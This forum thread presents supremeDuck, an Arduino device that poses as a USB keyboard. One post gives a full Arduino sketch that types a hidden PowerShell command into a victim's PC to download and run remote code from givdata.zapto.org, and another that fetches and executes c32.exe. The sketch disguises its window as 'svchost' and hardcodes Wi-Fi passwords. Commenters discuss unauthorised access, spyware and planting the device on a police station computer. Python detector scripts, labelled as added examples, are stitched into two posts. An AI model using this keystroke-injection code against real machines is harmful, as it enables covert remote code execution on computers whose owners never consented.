[Tutorial] supremeDuck (pranking device)

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
What is it?
It's an Arduino-based device which can be connected to a PC and pretend to be a "Human Interface Device" like a keyboard and mouse. This project uses a smartphone running Android to trigger specific actions. The Android application was made using "MIT App Inventor 2" and is open source, as is the Arduino sketch, so the user can adjust its functionality.

What can you do with it?
Plug it into your friend's PC and by pressing a button on your Android smartphone:
- access a website
- play a YouTube video
- type pre-defined text of your choice
- download and execute a file
- move the mouse cursor
- and much more...



[video=youtube]https://www.youtube.com/watch?v=FsTeedpYeg4[/video]


Functionality - YouTube video
Dynamic language encoding - YouTube video


More info
https://github.com/michalmonday/supremeDuck

Tutorial
https://github.com/michalmonday/supremeDuck/wiki/DIY-Tutorial

[img=500x312]https://i.imgur.com/3obiXgm.png[/img]

How to get it?
1. Follow the tutorial and make it yourself.
2. Get it from me at: http://monday.pythonanywhere.com/
 

Cinaro

Well-known member
Joined
Jun 30, 2015
Messages
277
Reaction score
5
Interesting, I'm gonna make this when I have time so I can mount this shit in the police station's free-use PC we have here and play a good old song.
 

0BE4

Active member
Joined
Jan 15, 2017
Messages
124
Reaction score
2
What if it's just simply a flash drive that would replace some .dll required for Windows by something that would connect the computer to a server run by your computer... instead of you making functions, why won't it be like: you write the C++ or C# code, then it gets compiled there?

Advantages:
ANYONE can make it...
much cheaper...
much simpler...
would work even if you are in a different country...
can give you a view of their webcam and desktop...
999999999x as powerful....
Can display stuff on their computer directly without another program...
and for people who don't know how to code... they can simply download codes...

Disadvantages:
simple enough... both of you would need an internet connection... but who cares?? everyone now has an internet connection...

@monday
 

0x32789

Expert
Joined
May 26, 2014
Messages
849
Reaction score
51
Location
LongForgotten <-> 0x32789
opcode said:
What if it's just simply a flash drive that would replace some .dll required for Windows by something that would connect the computer to a server run by your computer... instead of you making functions, why won't it be like: you write the C++ or C# code, then it gets compiled there?

Advantages:
ANYONE can make it...
much cheaper...
much simpler...
would work even if you are in a different country...
can give you a view of their webcam and desktop...
999999999x as powerful....
Can display stuff on their computer directly without another program...
and for people who don't know how to code... they can simply download codes...

Disadvantages:
simple enough... both of you would need an internet connection... but who cares?? everyone now has an internet connection...

@monday

Not everyone has an internet connection, like I don't.
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
@opcode
I actually made one with Wi-Fi hidden inside an MP3 player case and one with GSM activation so you could actually call it ;p

That's the wifi one
[img=600x400]http://i.imgur.com/FxgN5mv.jpg[/img]

[img=450x500]http://i.imgur.com/3Ga0VM5.jpg[/img]

But neither was the best solution for it.

Anyway... there's no "autorun" for a flash drive, so you'd have to manually execute/move these files.
(or you actually can? https://www.youtube.com/watch?v=lFlgddjOPpw)
You could use the original Hak5 Rubber Ducky though, which acts like a USB hub: part of it stores the file, another part acts as a HID which finds the location of the storage through the Windows command prompt and executes the file. I have no idea how to do it with an Arduino and it's not a trivial task.

Wi-Fi requires you to provide the password for the network; Bluetooth works anywhere.

I'm not sure what you mean by "you write the C++ or C# code then it gets compiled there": it gets compiled where and how? This thing requires physical access to the PC. You could make some kind of spyware and place it on the victim's PC manually, or use the original Rubber Ducky; the supremeDuck isn't the best tool for that because it gets recognized by the PC as "Arduino" too, which makes its HID abilities not 100% reliable on every system, as mentioned in the main post. But you could still try it using supremeDuck: as long as you know the language encoding (and it's Win 8 or Win 10), there's a commented-out piece of code within the Arduino sketch which activates a "secret" function.

Code:
/*
#define EEPROM_ADDRESS_TRIGGER_TRICK 0
trick = plug it in + plug out within 3 secs = special function is triggered (that special function is commented out in the "setup" function)
*/




/*//within void Setup()
  //TRIGGER TRICK
  //plug in and out within 3 sec to trigger some action at the next plug in
  byte triggerDefault = 0;
  EEPROM.get(EEPROM_ADDRESS_TRIGGER_TRICK, triggerDefault);
  byte c =1;
  EEPROM.put(EEPROM_ADDRESS_TRIGGER_TRICK, c);
  if(triggerDefault == 1)
  {
    //action
  }

  delay(3000);
  c =0;
  EEPROM.put(EEPROM_ADDRESS_TRIGGER_TRICK, c);  
  */ 
So you plug it in somewhere, unplug it within 3 seconds, plug it in again and it triggers some special function (e.g. download and execute a file using PowerShell).


Btw there are a few USB network-based projects aimed at unauthorised access, like Samy Kamkar's device based on the Raspberry Pi Zero
https://www.youtube.com/watch?v=Aatp5gCskvk

or the new product from Hak5 called Bash Bunny, which seems to be the best in its class (but it's like $100+)
https://www.youtube.com/watch?v=CvI_mrQYaF8

supremeDuck has some potential to provide unauthorised access, but it's not 100% reliable, which is required by such tools. It does the pranking job relatively well, so that's why the app + the whole project isn't aimed at exploiting but at pranking instead.
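The plug-in, unplug-within-3-seconds, plug-in-again trigger described above leaves a distinctive trace in a host's USB attach/detach events, and a board of this kind enumerates as a keyboard that also carries a serial port. What follows is an added example, not code from this post or from the supremeDuck project: a Python script that reads such events and flags both patterns. The event format, host timestamps and device names are constructed for the example; VID 2341 is Arduino's vendor ID, and the product ID and the 3-second window are illustrative values taken from the behaviour described in the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# USB attach/detach events in a constructed format (assumed for this example):
# <timestamp> action=add|remove vid=<hex> pid=<hex> name="<product>" classes=<A,B>
EVENT_RE = re.compile(
    r'^(?P<ts>\S+)\s+action=(?P<action>add|remove)\s+vid=(?P<vid>[0-9a-fA-F]{4})\s+'
    r'pid=(?P<pid>[0-9a-fA-F]{4})\s+name="(?P<name>[^"]*)"\s+classes=(?P<classes>\S+)$'
)

# Constructed sample: an Arduino-class board plugged in, pulled after 2 s and
# plugged back in (the trigger sequence), then an ordinary receiver that stays
# attached for 40 minutes. VID 2341 is Arduino's; the PID and names are illustrative.
SAMPLE_EVENTS = """
2017-03-01T10:30:00Z action=add    vid=2341 pid=8036 name="Arduino Leonardo" classes=HID,CDC
2017-03-01T10:30:02Z action=remove vid=2341 pid=8036 name="Arduino Leonardo" classes=HID,CDC
2017-03-01T10:30:09Z action=add    vid=2341 pid=8036 name="Arduino Leonardo" classes=HID,CDC
2017-03-01T11:00:00Z action=add    vid=046d pid=c52b name="Logitech USB Receiver" classes=HID
2017-03-01T11:40:00Z action=remove vid=046d pid=c52b name="Logitech USB Receiver" classes=HID
"""


def parse_events(text):
    """Turn the constructed log text into a list of event dicts, skipping malformed lines."""
    events = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        rec["classes"] = set(rec["classes"].split(","))
        events.append(rec)
    return events


def analyze(text, replug_window=timedelta(seconds=3)):
    """Return {"vid:pid name": [reasons]} for devices that look like a HID injector.

    hid_plus_serial: a keyboard/mouse class device that also exposes a serial
                     (CDC) interface, as the Arduino-based board does.
    quick_replug:    attach, detach within replug_window, then attach again,
                     which is the EEPROM trigger sequence from the post.
    """
    by_device = defaultdict(list)
    for ev in parse_events(text):
        by_device[(ev["vid"], ev["pid"])].append(ev)

    findings = {}
    for (vid, pid), evs in by_device.items():
        reasons = []
        if {"HID", "CDC"} <= evs[0]["classes"]:
            reasons.append("hid_plus_serial")
        # Events for one device are already in time order; look for add/remove/add.
        for a, r, a2 in zip(evs, evs[1:], evs[2:]):
            actions = (a["action"], r["action"], a2["action"])
            if actions == ("add", "remove", "add") and r["ts"] - a["ts"] <= replug_window:
                reasons.append("quick_replug")
                break
        if reasons:
            findings[f"{vid}:{pid} {evs[0]['name']}"] = reasons
    return findings


if __name__ == "__main__":
    for device, reasons in analyze(SAMPLE_EVENTS).items():
        print(device, "->", ", ".join(reasons))
```

Neither signal is conclusive on its own (development boards with a serial port are common on an engineer's desk, and people do fumble a plug), so a real deployment would raise the score rather than block, and would pair this with the process-creation view: a keyboard that starts typing into a Run box seconds after attaching is the stronger tell.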
 

0BE4

Active member
Joined
Jan 15, 2017
Messages
124
Reaction score
2
Well, I mean if you can write code, then send it to a user as a text message... then it's saved into a file... then that code gets compiled on the victim's computer... well, I thought autorun.inf did the thing of autorunning... nice project anyway... also, can I have the Wi-Fi edition's code? @monday
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
I doubt you'll find it valuable... the code is a mess. Also, ESP8266 modules have different firmwares; sellers usually sell the modules with outdated firmware, so you'd have to reflash it yourself, otherwise it won't work. It took me 3 days of regular battle to make it work; I think it's just not worth it.


Code:
#include <SoftwareSerial.h>
#include "Keyboard.h"
#include <EEPROM.h>
//#define _SS_MAX_RX_BUFF 256 // RX buffer size //BEFORE WAS 64



SoftwareSerial esp8266Module(8, 9); // RX, TX

String network[2] = {"TestingName", "SKYE1467"};
String password[2] = {"TestingPass", "DTRAWDSS"};
int myNetworksCount = 2;
unsigned long startTimeTimedLoop;
int wifiStatus = 1;
#define WEBDELIVERY_CODE "37s8nf82n0l"


void setup() {

  Serial.begin(9600);
  esp8266Module.begin(9600);//(115200);

  //plug in and out within 3 sec to trigger webdelivery at the next plug in
  char triggerDefault = 0;
  EEPROM.get(0, triggerDefault);
  char c = 1;
  EEPROM.put(0, c);
  if (triggerDefault == 1)
  {
    PowershellDownloadFile();
    //Web_Delivery();
  }

  delay(3000);
  c = 0;
  EEPROM.put(0, c);


  delay(5000);
}

void loop()
{
  switch (wifiStatus)
  {
    case 0:    // 0 need to reset or beginning of loop
      Serial.println("TRYING esp8266Reset");
      esp8266Reset();
      break;
    case 1:    // 1 reset complete check wifi mode
      delay(200);
      Serial.println("TRYING changeWifiMode");
      changeWifiMode();
      break;
    case 2:    // 2 wifi mode is 3, now check network connection
      delay(200);
      Serial.println("TRYING checkWifiStatus");
      checkWifiStatus();
      break;
    case 3:    // 3 If not connected connect to network
      delay(200);
      Serial.println("TRYING connectToWifi");
      connectToWifi();
      //connectToWifi("networkIdetifier", "networkPassword");
      break;
    case 4:    // 4 request page from server
      delay(200);
      Serial.println("TRYING getPage");

      getPage("givdata.zapto.org", "/test", true, "5123"); // (website, page, isItMyServer, port)
      // getPage("sa-mp.im", "/api/v1/players/get", false, "80");

      break;
    case 5:    // 5 unlink from server after request
      delay(200);
      Serial.println("TRYING unlinkPage");
      unlinkPage();
      break;
  }
}

bool esp8266Reset() {
  esp8266Module.println(F("AT+RST"));
  //esp8266Module.println("AT+RST\r\n");

  startTimeTimedLoop = millis();
  while (TimedLoop(7000))
  {
    if (esp8266Module.find("ready") || esp8266Module.find("WIFI CONNECTED") || esp8266Module.find("WIFI GOT IP"))
    {
      wifiStatus = 1;
      Serial.println("Resetted");
      return true;
    }
  }
  wifiStatus = 0;
  return false;
}

bool changeWifiMode()
{
  esp8266Module.println(F("AT+CWMODE?"));
  startTimeTimedLoop = millis();
  while (TimedLoop(1000))
  {
    if (esp8266Module.find("1"))
    {
      wifiStatus = 2;
      return true;
    }
  }

  esp8266Module.println(F("AT+CWMODE=1"));
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    if (esp8266Module.find("no change") || esp8266Module.find("OK"))
    {
      wifiStatus = 2;
      return true;
    }
  }
  wifiStatus = 0;
  return false;
}

bool checkWifiStatus() {
  esp8266Module.println("AT+CWJAP?");
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    if (esp8266Module.find(":")) //"No AP" is displayed if it's not connected
    {
      Serial.println("WIFI NETWORK CONNECTED");
      wifiStatus = 4;
      return true;
    }
  }
  wifiStatus = 3;
  return false;
}

bool connectToWifi()
{
  esp8266Module.println("AT+CWLAP");
  bool foundAppropriateNetwork = false;
  int appropriateNetworkIndex = 0;
  startTimeTimedLoop = millis();
  String netLineBuff = "";
  while (TimedLoop(12000) && foundAppropriateNetwork == false)
  {
    while (esp8266Module.available() > 0)
    {
      char c = esp8266Module.read();
      netLineBuff += c;
      if (c == ')')
      {
        Serial.println(netLineBuff);
        for (int i = 0; i < myNetworksCount; i++)
        {
          if (netLineBuff.indexOf(network[i]) >= 0)
          {
            foundAppropriateNetwork = true;
            appropriateNetworkIndex = i;
            netLineBuff = "";
            break;
          }
        }
        netLineBuff = "";
      }
    }
  }

  if (foundAppropriateNetwork == true)
  {
    String cmd = F("AT+CWJAP=\"");
    cmd += network[appropriateNetworkIndex];
    cmd += F("\",\"");
    cmd += password[appropriateNetworkIndex];
    cmd += F("\"");
    Serial.println("Trying to connect with: ");
    Serial.print("Name - ");
    // use the index of the matched network (the original indexed these by the bool flag, so always entry 1)
    Serial.println(network[appropriateNetworkIndex]);
    Serial.print("Password - ");
    Serial.println(password[appropriateNetworkIndex]);

    esp8266Module.println(cmd);
    startTimeTimedLoop = millis();
    while (TimedLoop(5000))
    {
      if (esp8266Module.find("OK"))
      {
        Serial.println("CONNECTED TO WIFI");
        wifiStatus = 4;
        return true;
      }
    }
  }

  wifiStatus = 0;
  return false;
}

bool getPage(String website, String page, bool isItMyServer, String port) {
  String cmd = F("AT+CIPSTART=\"TCP\",\"");
  cmd += website;
  cmd += F("\",");
  cmd += port;
  Serial.println(cmd);
  esp8266Module.println(cmd);

  bool linkedToServer = false;
  startTimeTimedLoop = millis();
  while (TimedLoop(5000))
  {
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }

    if (esp8266Module.find("CONNECT")) //Linked"))
    {
      Serial.println("Connected to server");
      linkedToServer = true;
    }
    else if (esp8266Module.find("ALREADY CONNECTED"))
    {
      Serial.println("Connection already established");
      linkedToServer = true;
    }
  }

  if (linkedToServer == false)
  {
    Serial.println("ERROR: Failed to connect with the server: ");
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }
    //wifiStatus = 0;
    return false;
  }

  cmd =  "GET ";
  cmd += page;
  //cmd += "?something=1&lol=2";
  //cmd += " HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: www.onet.pl\r\nConnection: close\r\nUser-Agent: Python-urllib/2.7\r\n\r\n";
  cmd += " HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: ";
  cmd += website;
  if (isItMyServer == true)
  {
    cmd += ":";
    cmd += port;
  }
  cmd += "\r\nConnection: close\r\nUser-Agent: Python-urllib/2.7\r\n\r\n";

  Serial.println(cmd);
  esp8266Module.print("AT+CIPSEND=");
  esp8266Module.println(cmd.length() + 1);
  Serial.println(cmd.length() + 1);

  bool httpRequestInputReady = false;
  startTimeTimedLoop = millis();
  while (TimedLoop(3000) && httpRequestInputReady == false)
  {
    if (esp8266Module.find(">"))
    {
      Serial.println("found > prompt - issuing GET request");
      esp8266Module.println(cmd);
      httpRequestInputReady = true;
    }
  }

  if (httpRequestInputReady == false)
  {
    wifiStatus = 5;
    Serial.println("ERROR: No '>' prompt received after AT+CIPSEND");
    return false;
  }

  startTimeTimedLoop = millis();
  String dataRetrieved = "";
  char c;
  while (TimedLoop(7000))
  {
    while (esp8266Module.available() > 0)
    {
      c = esp8266Module.read();
      Serial.write(c);
      dataRetrieved += c;

      if (dataRetrieved.length() > 300)
      {
        CheckProtocol(dataRetrieved);
        dataRetrieved = "";
      }
    }

    if (dataRetrieved.indexOf("CLOSED") >= 0)
    {
      CheckProtocol(dataRetrieved);
      dataRetrieved = "";
    }
  }

  if (esp8266Module.find("test"))
  {
    Serial.println("Success");
    wifiStatus = 5;
    return true;
  }
  else
  {
    wifiStatus = 5;
    return false;
  }

}

bool unlinkPage() {
  esp8266Module.println(F("AT+CIPCLOSE"));
  //esp8266Module.println("AT+CIPCLOSE");
  startTimeTimedLoop = millis();
  while (TimedLoop(3000))
  {
    while (esp8266Module.available() > 0)
    {
      Serial.write(esp8266Module.read());
    }

    if (esp8266Module.find("CLOSED"))//Unlink
    {
      Serial.println("Unlinked");
      wifiStatus = 0;
      return true;
    }
  }
  wifiStatus = 4;
  return false;
}

bool TimedLoop(unsigned long limit)
{
  if (millis() - startTimeTimedLoop > limit)
  {
    return false;
  }
  return true;
}

void openRun()
{
  Keyboard.press(KEY_LEFT_GUI);
  delay(200);
  Keyboard.press('r');
  delay(200);
  Keyboard.releaseAll();
}

void openCmd(int wait)
{
  openRun();
  delay(wait);
  Keyboard.print("cmd");
  typeKey(KEY_RETURN);
}

void EnterCommand(char text[])
{
  Keyboard.print(text);
  delay(10);
  typeKey(KEY_RETURN);
}

void EnterCommand(String text)
{
  Keyboard.print(text);
  delay(10);
  typeKey(KEY_RETURN);
}

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void CheckProtocol(String str)
{
  if (str.indexOf(WEBDELIVERY_CODE) >= 0)
  {
    Web_Delivery();
    //delay(3000);
    //openCmd(300);
    //delay(500);
    //EnterCommand("echo off & color 78 & cls");
    //delay(500);

    //Keyboard.print("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://givdata.zapto.org:5432/'); & exit");
    //typeKey(KEY_RETURN);
  }
}


void Web_Delivery()
{
  delay(3000);
  openCmd(300);
  delay(500);
  EnterCommand("echo off & title svchost & color 78  & cls");
  delay(500);

  Keyboard.print("powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://givdata.zapto.org:5432/'); & exit");
  typeKey(KEY_RETURN);


  //EnterCommand(cmd);
}

void PowershellDownloadFile()
{
  delay(3000);
  openCmd(300); //("powershell Start-Process cmd -Verb runAs");
  delay(500);
  EnterCommand("echo off & mode 20,1 & title svchost & color 78 & cls"); 
  EnterCommand("powershell @$down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?6w1304v8q'; $file = 'c32.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;@ & exit");

  //stealth way (idk if works)
  //openRun();
  //delay(700);
  //EnterCommand("powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?6wv46518q'; $file = 'c32.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;");

}
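The two command lines the sketch above types (the hidden-window PowerShell download cradle and the cmd window retitled to "svchost") are exactly what an endpoint defender would key on. The following is an added example, not code from this thread or from the supremeDuck project: a small Python detector that scores process-creation records for those indicators and alerts when enough of them coincide. The record format, host and user names are constructed for the example; the flagged command lines are the ones from the sketch.

```python
import re
from typing import NamedTuple


class Indicator(NamedTuple):
    name: str
    weight: int
    pattern: "re.Pattern[str]"


# Indicators taken from the command lines the sketch types. Each is weak on its
# own (admins use -NoProfile too), so they are weighted and an alert needs a
# total of at least ALERT_THRESHOLD.
INDICATORS = [
    Indicator("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    Indicator("no_profile", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    Indicator("webclient_download", 1, re.compile(r"net\.webclient.*?download(?:string|file)\(", re.I)),
    Indicator("invoke_expression", 1, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    Indicator("shell_execute", 1, re.compile(r"shellexecute\(", re.I)),
    # a cmd window retitled to look like a system process weighs more by itself
    Indicator("spoofed_title", 2, re.compile(r"\btitle\s+svchost\b", re.I)),
]
ALERT_THRESHOLD = 2

# Process-creation records in a constructed format (assumed for this example):
# <timestamp> host=<h> user=<u> parent=<parent image> image=<image> cmdline="<cmd>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline="(?P<cmdline>.*)"$'
)

# Constructed sample log: two benign PowerShell launches, then the cmd line and
# the two PowerShell lines exactly as the sketch above types them.
SAMPLE_LOG = r"""
2017-03-01T10:21:05Z host=LAB-PC user=alice parent=explorer.exe image=powershell.exe cmdline="powershell.exe -Command Get-Date"
2017-03-01T10:22:11Z host=LAB-PC user=alice parent=svchost.exe image=powershell.exe cmdline="powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"
2017-03-01T10:30:40Z host=LAB-PC user=alice parent=explorer.exe image=cmd.exe cmdline="echo off & title svchost & color 78  & cls"
2017-03-01T10:30:41Z host=LAB-PC user=alice parent=cmd.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -c $u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $u.downloadstring('http://givdata.zapto.org:5432/'); & exit"
2017-03-01T10:35:02Z host=LAB-PC user=alice parent=cmd.exe image=powershell.exe cmdline="powershell @$down = New-Object System.Net.WebClient; $url = 'https://1fichier.com/?6w1304v8q'; $file = 'c32.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;@ & exit"
"""


def score_command_line(cmdline):
    """Return (total weight, [indicator names]) for one command line."""
    hits = [ind for ind in INDICATORS if ind.pattern.search(cmdline)]
    return sum(ind.weight for ind in hits), [ind.name for ind in hits]


def parse_line(line):
    """Parse one constructed log record into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(log_text, threshold=ALERT_THRESHOLD):
    """Run the indicators over every record and return the ones that reach the threshold."""
    alerts = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        score, hits = score_command_line(rec["cmdline"])
        if score >= threshold:
            alerts.append({"ts": rec["ts"], "parent": rec["parent"],
                           "image": rec["image"], "score": score, "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["parent"]} -> {alert["image"]} '
              f'score={alert["score"]} hits={",".join(alert["hits"])}')
```

The parent image is carried through on purpose: a PowerShell launched by cmd.exe that was itself launched from explorer.exe via the Run box is the chain a keystroke-injecting device produces, and correlating that with the USB attach time is what turns a score into an incident.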
 

0x32789

Expert
Joined
May 26, 2014
Messages
849
Reaction score
51
Location
LongForgotten <-> 0x32789
tbh the "run" box appearing looks horrible whenever you do some command; why not just change it, just execute a cmd.exe, or you can also launch apps by a single line in C++. Idk what you are using to execute commands, but whatever that way is, it's horrible :/
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
@0x32789
It uses keyboard/mouse input only, nothing more. You could decrease the delay within the code, because now it's set to a value which would work on slower PCs.
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
PayPal and bank card payments are now accepted. The sale is limited to 1 device per person. It's available at: http://monday.pythonanywhere.com/

Btw the domain name is probably temporary; thanks to PythonAnywhere it is hosted for free, but I'll probably change "monday" to something different or I'll get a proper domain name (which isn't possible with free hosting on PythonAnywhere).
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
149
Now the Android app is also available at:
https://play.google.com/store/apps/details?id=appinventor.ai_michalmonday17.supremeDuck
 